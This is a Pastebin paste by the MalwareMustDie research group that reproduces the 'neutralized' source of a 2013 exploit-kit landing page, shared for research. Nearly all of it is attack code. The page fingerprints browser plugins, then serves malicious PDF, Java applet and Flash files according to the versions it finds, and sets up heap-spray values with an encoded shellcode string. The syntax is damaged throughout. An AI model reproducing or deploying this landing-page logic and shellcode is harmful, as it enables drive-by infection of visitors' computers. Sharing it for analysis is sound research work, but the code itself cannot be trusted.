MalwareMustDie

#MalwareMustDie - Cool Exploit Landing Page -2- 20130114

Jan 14th, 2013
296
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie
  2. // Cool Exploit Landing Page Code Structure...
  3. // Is a Neutralized Code. for research purpose.
  4.  
  5. <html>
  6. <head>
  7. <title>Fund Wipe</title>
  8. <link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /
  9. <meta http-equiv="Content-Type" content="text/html" /
  10.  
  11. // ====================================================
  12. // first script...
  13. // ====================================================
  14. <script type='text/javascript'
  15.  
  16.  pull=false;
  17.  Roar=0;
  18.  if(navigator.plugins && navigator.plugins.length)
  19.  {
  20.    for(var Afternoon=0; Afternoon<navigator.plugins.length;Afternoon++)
  21.    {
  22.      if(navigator.plugins[Afternoon].description.indexOf('Adobe Acrobat')!-1)
  23.      {
  24.        Roar=parseFloat(navigator.plugins[Afternoon].description.split('Version ')[1]);
  25.        pull=true;
  26.        break
  27.      }
  28.      if(navigator.plugins[Afternoon].description.indexOf('Adobe PDF')!-1)
  29.      {
  30.        pull=true;
  31.        break
  32.      }
  33.    }
  34.  }
  35.  else if (window.ActiveXObject)
  36.  {
  37.    var control = null;
  38.    try
  39.    {
  40.      control = new ActiveXObject('AcroPDF.PDF');
  41.    }
  42.    catch (e)
  43.    {
  44.    }
  45.    if (!control)
  46.    {
  47.      try
  48.      {
  49.        control = new ActiveXObject('PDF.PdfCtrl');
  50.      }
  51.      catch (e)
  52.      {
  53.      }
  54.    }
  55.    if (control)
  56.    {
  57.      isInstalled = true;
  58.      version = control.GetVersions().split(',');
  59.      version = version[0].split('=');
  60.      version = parseFloat(version[1]);
  61.      Roar=version;
  62.      pull=true;
  63.    }
  64.  }
  65.  Roar=parseInt(Roar);
  66. /script>
  67.  
  68. // --------------------------------------------
  69. // Some htmls..
  70. // --------------------------------------------
  71. /head>
  72. <body>
  73. <div id="heap_allign"></div>
  74. <div id="table_div"></div>
  75. Fireplace Exaggerate Enlighten Grain<center>Bride Monster Roast Cinema</center>
  76. insight suicide auction usage fireplace race worse precaution core module indication relaxation often sweeten postpone appalling spending boast leadership videotaped chair tune
  77.  
  78.  
  79. // ====================================================
  80. // a java applet
  81. // ====================================================
  82.  
  83. <applet archive="/news/tentative.jar" code="hw.class" width="300" height="300" type="application/x-java-applet;version=1.6"></applet>
  84.  
  85.  
  86. // --------------------------------------------
  87. // some texts..
  88. // --------------------------------------------
  89. TERMINATE DEPOT ELECTORAL ENQUIRY EYE EXERCISE SPOUSE GLEE<h3>EDITOR MAGAZINE CONFIRM NARRATIVE</h3><small>attention vessel bolt</small>prevalence myself articulate liberate attractive lower ale precision abandon herself stair wish reality glimpse bass magical colour monster slip strap tax available probe banking mystery specialise
  90.  
  91.  
  92. // ====================================================
  93. // SECOND SCRIPT - first part is a condensed javascript....
  94. // ====================================================
  95.  
  96. <script>function HAIRY(POWDER, ATOMIC)var proceeding_ ='7817';var hammer ='COMMENTARY DISGUST GREET BITE';} proprietor = 943;if ( proprietor>=195){document.body.appendChild(document.createElement("p","Deck Venture Lion Firmly Keen Jail Surprising")); document.body.appendChild(document.createElement("p","1182"));document.body.appendChild(document.createElement("p","evolve secretly region meadow"));else if(proprietor<=240){document.body.appendChild(document.createElement("p","Insult Buy Avoidance Document Sunday Rightly Unify")); var differencecentre ="Well Administer Shout Constant Rabbi Journalist";var SURFACE=[0,0,0,0];tryvar statement=function()var refer={Heredity:null,exceed:null,Offer:'application/npruntime-scriptable-plugin;DeploymentToolkit',Orchestra:'application/java-deployment-toolkit',Century:null,Sand:null,CHORD:function()var immense=new Array();if(this.OUGHT())var POORLY=this.Want();var Them=POORLY.jvms;for(var i=0;i<Them.getLength();i++){immense[i]=Them.get(i).version}}elsevar br = this.g6();if(br=='MSIE')if(this.ax('1.7.0')){immense[0]'1.7.0'else if(this.ax('1.6.0')){immense[0]'1.6.0'else if(this.ax('1.5.0')){immense[0]'1.5.0'else if(this.ax('1.4.2')){immense[0]'1.4.2'else if(this.tm()){immense[0]'1.1'}}else if(br=='Netscape Family')this.gj();if(this.Heredity!null){immense[0]this.Heredityelse if(this.tt('1.7')){immense[0]'1.7.0'else if(this.tt('1.6')){immense[0]'1.6.0'else if(this.tt('1.5')){immense[0]'1.5.0'else if(this.tt('1.4.2')){immense[0]'1.4.2'}}}return immense},ax:function(h)var on='JavaWebStart.isInstalled.'+h+'.0';if(typeof ActiveXObject=='undefined'||!ActiveXObject)return false;tryreturn (new ActiveXObject(on)!null)catch(exception)return false}},tm:function()var clsid='{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';if (typeof oClientCaps!'undefined')var v=oClientCaps.getComponentVersion(clsid,"ComponentID");if((v=='')||(v=='5,0,5000,0'))return falseelsereturn true}}elsereturn false}},tt:function(ga)if(!navigator.mimeTypes)return false;for(var i=0;i<navigator.mimeTypes.length;++i){s=navigator.mimeTypes[i].type;var m=s.match(/^application\/x-java-applet;version=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(m!null)if(this.cv(m[1],ga))return truereturn false,cv:function(ib,rq)var a=ib.split('.');var b=rq.split('.');for(var i=0;i<a.length;++i)a[i]Number(a[i]);for(var i=0;i<b.length;++i)b[i]Number(b[i]);if(a.length==2)a[2]0;if(a[0]>b[0])return true;if(a[0]<b[0])return false;if(a[1]>b[1])return true;if(a[1]<b[1])return false;if(a[2]>b[2])return true;if(a[2]<b[2])return false;return true,gj:function()for(var i=0;i<navigator.mimeTypes.length;++i)var s=navigator.mimeTypes[i].type;var m=s.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(m!null)this.Heredity=m[1];if('Opera'!this.Sand)break}}},OUGHT:function()var pk=this.Want();if(pk&&pk.jvms)return trueelsereturn false}},ap:function()this.g6();return ('Safari'!this.Sand&&'Opera'!this.Sand),Want:function()this.rf();var r = null;if (this.ap())r = document.getElementById('deployJavaPlugin');return r},g6:function()if (this.Century == null)var br=navigator.userAgent.toLowerCase();if((br.indexOf('msie')!-1)&&(br.indexOf('opera')==-1))this.Century'MSIE';this.Sand'MSIE'else if(br.indexOf('iphone')!-1)this.Century'Netscape Family';this.Sand'iPhone'else if((br.indexOf('firefox')!-1)&&(br.indexOf('opera')==-1))this.Century'Netscape Family';this.Sand'Firefox'else if(br.indexOf('chrome')!-1)this.Century'Netscape Family';this.Sand'Chrome'else if(br.indexOf('safari')!-1)this.Century'Netscape Family';this.Sand'Safari'else if((br.indexOf('mozilla')!-1)&&(br.indexOf('opera')==-1))this.Century'Netscape Family';this.Sand'Other'else if(br.indexOf('opera')!-1)this.Century'Netscape Family';this.Sand'Opera'elsethis.Century'?';this.Sand'unknown'}}return this.Century,wt:function()var br=this.g6();if(br=='MSIE'){document.write('<'+'object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" '+'id="deployJavaPlugin" width="0" height="0">'+'<'+'/'+'object'+'>')else if(br=='Netscape Family'&&this.ap())this.we()}},rf:function(){navigator.plugins.refresh(false);var br=this.g6();if(br=='Netscape Family'&&this.ap())var pj=document.getElementById('deployJavaPlugin');if(pj==null)this.we()}},we: function()var wn=false;if(navigator.mimeTypes!null)for(var i=0;i<navigator.mimeTypes.length;i++)if(navigator.mimeTypes[i].type==this.Orchestra)if(navigator.mimeTypes[i].enabledPlugin){document.write('<'+'embed id="deployJavaPlugin" type="'+this.Orchestra+'" hidden="true" />');wn=true}}if(!wn)for(var i=0;i<navigator.mimeTypes.length;i++)if(navigator.mimeTypes[i].type==this.Offer)if(navigator.mimeTypes[i].enabledPlugin)document.write('<'+'embed id="deployJavaPlugin" type="'+this.Offer+'" hidden="true" />')}}};refer.wt();if(refer.exceed==null)var l2=null;if(l2==null)try{l2=navigator.userLanguagecatch(err){pump_thanks=608; if ( pump_thanks<319){document.body.appendChild(document.createElement("p",'9783'));var wave_anger ='largescale everyday';var xraypollution='Storage Pop Survive Rising Clerical Shopkeeper';}}if(l2==null)try{l2=navigator.systemLanguagecatch(err){}if(l2==null)try{l2=navigator.languagecatch(err){}if(l2!null){l2.replace("-","_");refer.exceed=l2}}return refer}();var SURFACE=statement.CHORD().toString().replace("_",".").split(".");function variable(STRENGTHEN){document.body.appendChild(document.createElement("p","758"));document.body.appendChild(document.createElement("p","THICK TRUCE HOW PATRON ADEQUATE IMMIGRANT"));for(var i=0;i<SURFACE.length;i++)SURFACE[i]=parseInt(SURFACE[i]);function occupation(APPEAL){document.body.appendChild(document.createElement("p",'166'));var vulnerablenovelist_ ='There Profound Respondent Extra';var noisy='9956';if(i<2){bureauindex = 642;if(bureauindex<= 802)var voucher_='bang science notion negotiate explicitly';var ion_="";document.body.appendChild(document.createElement("p","Blue Bin Precedent")); }SURFACE=[0,0,0,0]}}catch(e){}trace = 506 / 428; if( trace== 147) {document.body.appendChild(document.createElement("p","COURAGE DISAPPOINT PRECISION FLEE")); var ourselvesportrait_="rot excite act stance safeguard intense supplement";document.body.appendChild(document.createElement("p",'1337'));elsevar hopeless_comb="CURSE POTATO COMB LEGEND";function defect_lender(CARDBOARD, DELIGHTFUL, SWELL)var flatten_="1054"; var cultural_ ="57";document.body.appendChild(document.createElement("p",'801'));
  97.  
  98. // ======================================================================
  99. // continued by the next javascript un-condensed of the second script
  100. // =======================================================================
  101.  
  102.  if ((SURFACE[1]6&&SURFACE[0]0)||(SURFACE[1]==6&&SURFACE[3]33)||(SURFACE[1]==7&&SURFACE[3]9))
  103.  {
  104.    setTimeout('Grab();', 6480);
  105.  }
  106.  else
  107.  {
  108.    function ulcer_nasty(ask, local)
  109.    {
  110.      var door_ ="republican abolition";
  111.      var unclear_ ="educator pleased capital very";
  112.    }
  113.    Grab();
  114.    function minutedevil(Tray, Theft, Garage)
  115.    {
  116.      var enquiremore ="linger waiting rehearsal";
  117.      document.body.appendChild(document.createElement("p",""));
  118.      var fragment_ ='3552';
  119.    }
  120.  }
  121.  constitute_basin=null;
  122.  if(constitute_basin < 511)
  123.  {
  124.    var conceptual_aid='update meat beer insurance varying soccer';
  125.  }
  126.  else if(constitute_basin ==196)
  127.  {
  128.    document.body.appendChild(document.createElement("p",'8160'));
  129.    document.body.appendChild(document.createElement("p",'VOLUNTEER'));
  130.    document.body.appendChild(document.createElement("p","IMPULSE SAKE TREASURY EMOTIONAL GARDENER DISPOSE HERITAGE"));
  131.  }
  132.  function Grab()
  133.  {
  134.    retreat = true;
  135.    if ( retreat >132)
  136.    {
  137.      var carryaluminium ="6091";
  138.      document.body.appendChild(document.createElement("p","203"));
  139.    }
  140.    else if(retreat > 611)
  141.    {
  142.      var diagnosis_ ='7766';
  143.    }
  144.    if (pull||(Roar>0&&Roar<10))
  145.    {
  146.      var DETAIL=document.createElement('div');
  147.      function ATTENTIONAMATEUR(tactic, diameter, warrant)
  148.      {
  149.        var hey ='7221';
  150.        document.body.appendChild(document.createElement("p","8241"));
  151.        document.body.appendChild(document.createElement("p","Microphone Acceptable Exaggerate Fond Tide"));
  152.      }
  153.      DETAIL.innerHTML'<object data="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="200" height="100"><embed src="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="100" height="200" /></object>';
  154.      document.body.appendChild(DETAIL);
  155.      setTimeout('Feasible();', 6388);
  156.      bacondoll=true;
  157.      if ( bacondoll <=639)
  158.      {
  159.        document.body.appendChild(document.createElement("p",'8464'));
  160.      }
  161.      else if(bacondoll<= 829)
  162.      {
  163.        document.body.appendChild(document.createElement("p","PROMINENT SECURE"));
  164.        document.body.appendChild(document.createElement("p",'turnover colon'));
  165.        var security_='radius modesty';
  166.      }
  167.    }
  168.  }
  169.  function getCN()
  170.  {
  171.    return "/news/INDUSTRIAL1.SWF"
  172.  }
  173.  function getBlockSize()
  174.  {
  175.    return 1024
  176.  }
  177.  function getAllocSize()
  178.  {
  179.    return 1024*1024
  180.  }
  181.  function getAllocCount()
  182.  {
  183.    return 300
  184.  }
  185.  function getFillBytes()
  186.  {
  187.    var a='%'+'u'+'0'+'c'+'0c';
  188.    return a+a
  189.  }
  190.  function vfsq()
  191.  {
  192.    xz="%u";
  193.    var a="8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4f5!7064!7454!60b4!b5c5!c514!6474!1585!9404!c414!54d4!9444!b414!b574!f160!8181!c4f1!d4b1!11e4!e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59b1!7492!621a!6d2a!4c0b!6662!7d6a!6d7d!0c4b!e702!6d7d!8224!ce24!82d5!8a71!2df6!82d5!8a71!b3f6!a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8ed5!c3da!7de7!2482!b7f7!2482!2482!9697!53c2!0ac6!c281!2a9e!8217!5312!eec6!4444!60c4!53d2!fec6!a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b580!8050!c002!fec6!b1a1!e5a5!c0c2!fec6!f4b5!a5d4!c2c0!42fe!47c0!825a!9282!4cc2!a59a!a23c!7d3c!7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7dbc!bed2!83ba!3a67!3a4c!87d7!8e13!87ba!8282!7d82!8604!8724!8207!8282!0c82!ac1d!7d7d!0b7d!170c!24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17be!3867!b2de!c23a!5f3a!0fb2!423a!c7c0!4c7d!5ae6!4236!e43a!b25f!67c0!673a!d5ec!3173!3c9d!2f86!52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80b2!3ae5!dde7!05b2!c5d1!413a!3ad5!97e7!3c46!971c!ccd5!c0da!fac1!d53d!11e2!bee6!8681!093a!7d7d!d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a86!8681!c43a!b18e!1c77!d5c1!dacc!ffff!beff!508e!afbe!042e!0382!ef08!9ec3!6618!139c!0185!cfbe!4ecf!6638!1414!1414!".split("").reverse().join("");
  194.    return a["replace"](/!/g,xz)
  195.  };
  196.  getShellCode=vfsq;
  197.  function Archbishop()
  198.  {
  199.    try
  200.    {
  201.      try
  202.      {
  203.        var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
  204.        try
  205.        {
  206.          axo.AllowScriptAccess'always';
  207.        }
  208.        catch(e)
  209.        {
  210.          return '6,0,0';
  211.        }
  212.      }
  213.      catch(e)
  214.      {
  215.      }
  216.      return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];
  217.    }
  218.    catch(e)
  219.    {
  220.      try
  221.      {
  222.        if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)
  223.        {
  224.          return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];
  225.        }
  226.      }
  227.      catch(e)
  228.      {
  229.      }
  230.    }
  231.    return '0,0,0';
  232.  }
  233.  function Feasible()
  234.  {
  235.    var note=Archbishop().split(',');
  236.    if (((note[0]==10&&note[1]==0&&note[2]40)||(document&&(note[0]==10&&note[1]0)&&(note[0]==10&&note[1]2)))||window.document&&((note[0]==10&&note[1]==2&&note[2]159)||(note[0]==10&&note[1]2)))
  237.    {
  238.      var oSpan=document.createElement("div");
  239.      window["doc"+"ument"]["bo"+"dy"].appendChild(oSpan);
  240.      oSpan.innerHTML"<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='/news/definite2.swf' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='/news/definite2.swf' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
  241.    }
  242.  }
  243.  donatedisarm = null;
  244.  if(donatedisarm < 796)
  245.  {
  246.    document.body.appendChild(document.createElement("p","7282"));
  247.  }
  248.  try
  249.  {
  250.    document.body++;
  251.  }
  252.  catch(dsgsdg)
  253.  {
  254.  }
  255.  setTimeout(function()
  256.  {
  257.  }
  258.  ,9000);
  259.  document.write("<b style='color:red;font-size:50px'>" + SURFACE + "</b>");
  260.  </script>
  261.  
  262.  
  263. // --------------------------------------------
  264. // Some htmls....
  265. // --------------------------------------------
  266. HINGE LENGTHEN
  267. <div align='top' title='Discourse Similarly Enter Recorder Treatment'>Consensus Different Scar</div><hr>
  268. <acronym>Inquiry Ought Peak Incidence</acronym>
  269.  
  270. <article>Sell Scared Particle Upset</article><code>porter noble dream frightened</code>
  271.  
  272.  
  273. // ====================================================
  274. // Third Script is in here....
  275. // ====================================================
  276.  
  277. <script>
  278.  
  279.  great = 930;
  280.  if ( great> 927)
  281.  {
  282.    var vicious_actress='Terrorist Serious Maker Patch Dual';
  283.    var union ="731";
  284.    var active_='village';
  285.  }
  286.  else if(great>=627)
  287.  {
  288.    var technique_most_='7507';
  289.    document.body.appendChild(document.createElement("p","PAGE"));
  290.    var leisurepunishment ='5973';
  291.  }
  292.  function Deeply(Conquest)
  293.  {
  294.    document.body.appendChild(document.createElement("p",'1829'));
  295.  }
  296.  function HALFWAY(replace, tobacco)
  297.  {
  298.    document.body.appendChild(document.createElement("p","4696"));
  299.    document.body.appendChild(document.createElement("p","7442"));
  300.  }
  301.  function Associate(ABSENT)
  302.  {
  303.    document.body.appendChild(document.createElement("p","3002"));
  304.    var honestly_welcome="140";
  305.  }
  306.  function seeminglyconstitute(DEAF)
  307.  {
  308.    var sky ="PRIVACY";
  309.  }
  310. /script>
  311.  
  312.  
  313. <article>Linger White Mist Unexpected</article>
  314. RECIPIENT ITS PLEASE REGIMENT INHERENT CIVILIAN TIN RECKON PIT RELATION VOLUNTEER DECEMBER BREATH DEPART
  315.  
  316. // ====================================================
  317. // parts of embedded object PDF implemented.....
  318. // ====================================================
  319.  
  320. <noscript>
  321. <object data="/news/live1.pdf" type="application/pdf" width="100" height="300"
  322. <embed src="/news/live1.pdf" type="application/pdf" width="300" height="100" /></object>
  323. <object data="/news/Shore_Rightly2.pdf" type="application/pdf" width="300" height="300"><embed src="/news/Shore_Rightly2.pdf" type="application/pdf" width="200" height="200" /></object></noscript>
  324.  
  325.  
  326. // --------------------------------------------
  327. // Some HTMLS....
  328. // --------------------------------------------
  329. SANCTUARY PALM MONETARY THROUGH BIRTHDAY OPENING CRIMINAL BROTHER<center>Gram</center><br><i>Candle Blonde Even</i>
  330.  
  331.  
  332. // ====================================================
  333. // Fourth Javascript...
  334. // ====================================================
  335.  
  336. <script>
  337.  
  338.  expect=false;
  339.  if(expect== 844)
  340.  {
  341.    document.body.appendChild(document.createElement("p",'9121'));
  342.    document.body.appendChild(document.createElement("p","4252"));
  343.  }
  344.  recover_prison =218 /129;
  345.  if ( recover_prison < 125)
  346.  {
  347.    var smoothly="4329";
  348.    document.body.appendChild(document.createElement("p",'8158'));
  349.    var improved ='bitch';
  350.  }
  351.  wellconsistent= true;
  352.  if (wellconsistent == 339)
  353.  {
  354.    var assertiontakeover_="3798";
  355.    var donor_clarity_='Damaging Attainment Violin Rabbit';
  356.    var trouser="3367";
  357.  }
  358.  else if( wellconsistent> 684)
  359.  {
  360.    var frozenauthor_="5411";
  361.    var poll ="Recipe Main";
  362.    document.body.appendChild(document.createElement("p","8483"));
  363.  }
  364.  fluid =true;
  365.  if(fluid <= 631)
  366.  {
  367.    var regulationlacking_="decay flock inevitable";
  368.  }
  369.  
  370. /script>
  371.  
  372.  
  373. // --------------------------------------------
  374. // some ending htmls..
  375. // --------------------------------------------
  376. <article>CONFESSION RICE ALTER BOYFRIEND</article>
  377. CUTTING OFFICER UNSTEADY IMPRESS ILLEGAL WHENEVER ATTEMPT CHARM BAIL FOSTER NOBLEMAN
  378. /body>
  379. /html>
  380.  
  381. //--------
  382. #MalwareMustDie
RAW Paste Data